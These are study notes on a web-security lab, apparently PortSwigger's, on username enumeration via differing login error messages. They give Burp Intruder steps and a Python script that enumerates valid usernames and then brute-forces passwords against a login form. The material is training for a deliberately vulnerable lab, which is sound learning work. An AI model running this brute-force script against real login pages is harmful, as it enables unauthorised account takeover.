# Username enumeration via different responses
---
- _Username enumeration_ is when an attacker is able to observe changes in the website's behavior in order to identify whether a given username is valid.
- This typically occurs either on the login page.
- For example, when you enter a valid username but an incorrect password, or on registration forms when you enter a username that is already taken.

While attempting to brute-force a login page, you should pay particular attention to any differences in:
- **[[2. Username enumeration via different response| Status Codes]]**
- **[[3. Username enumeration via subtly different responses|Error messages]]**
- **[[4. Username enumeration via response timing|Response times]]**

# Lab: Username enumeration via different responses
---
1. With Burp running, investigate the login page and submit an invalid username and password.
2. In Burp, go to **Proxy > HTTP history** and find the `POST /login` request. Send this to Burp Intruder.
3. In Burp Intruder, go to the **Positions** tab. Make sure that the **Sniper** attack type is selected.
4. Click **Clear §** to remove any automatically assigned payload positions. 
	- Highlight the value of the `username` parameter and click **Add §** to set it as a payload position. 
	- This position will be indicated by two `§` symbols, for example: `username=§invalid-username§`. 
	- Leave the password as any static value for now.
5. On the **Payloads** tab, make sure that the **Simple list** payload type is selected.
6. Under **Payload settings**, paste the list of candidate usernames. Finally, click **Start attack**. The attack will start in a new window.
7. When the attack is finished, on the **Results** tab, examine the **Length** column. 
	- You can click on the column header to sort the results. Notice that one of the entries is longer than the others. 
	- Compare the response to this payload with the other responses. 
	- Notice that other responses contain the message `Invalid username`, but this response says `Incorrect password`. 
	- Make a note of the username in the **Payload** column.
8. Close the attack and go back to the **Positions** tab. 
	- Click **Clear**, then change the `username` parameter to the username you just identified. 
	- Add a payload position to the `password` parameter. 
	- The result should look something like this:  `username=identified-user&password=§invalid-password§`
9. On the **Payloads** tab, clear the list of usernames and replace it with the list of candidate passwords. Click **Start attack**.
10. When the attack is finished, look at the **Status** column. Notice that each request received a response with a `200` status code except for one, which got a `302` response. This suggests that the login attempt was successful - make a note of the password in the **Payload** column.
11. Log in using the username and password that you identified and access the user account page to solve the lab.

>[!note]
>It's also possible to brute-force the login using a single cluster bomb attack.
>However, it's generally much more efficient to enumerate a valid username first if possible.


```python
#!/usr/bin/env python3
# Username enumeration via different responses
import requests
import sys

# Debugging
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
p = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def user_list(url, user_path):
    with open(user_path, 'r') as f:
        for users in f.readlines():
            user = users.replace('\n', "")
            data = {'username':user, 'password':'wrongpassword'}
            req = requests.post(url, data=data, verify=False, proxies=p)
            if "Invalid username" not in req.text:
                return user
            continue
        return False

def pass_list(url, user, pass_path):
    with open(pass_path, 'r') as f:
        for passwords in f.readlines():
            password = passwords.replace('\n', "")
            data = {'username':user, 'password':password}
            req = requests.post(url, data=data, verify=False, proxies=p)
            if "Incorrect password" not in req.text:
                return password
            continue
        return False

if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
        username = sys.argv[2].strip()
        password = sys.argv[3].strip()
    except IndexError:
        print("[-] Usage: {} <url> <username> <password>".format(sys.argv[0]))
        print("[-] Example: {} http://example.com admin password".format(sys.argv[0]))
        sys.exit(1)
    
    print("[+] Enumerate the username...")
    user = user_list(url, username)
    if user:
        print(f"[-] Found the username...       [{user}]")
        print("[+] Enumerate the password...")
        passwd = pass_list(url, user, password)
        if passwd:
            print(f"[-] Found the password...       [{passwd}]")
```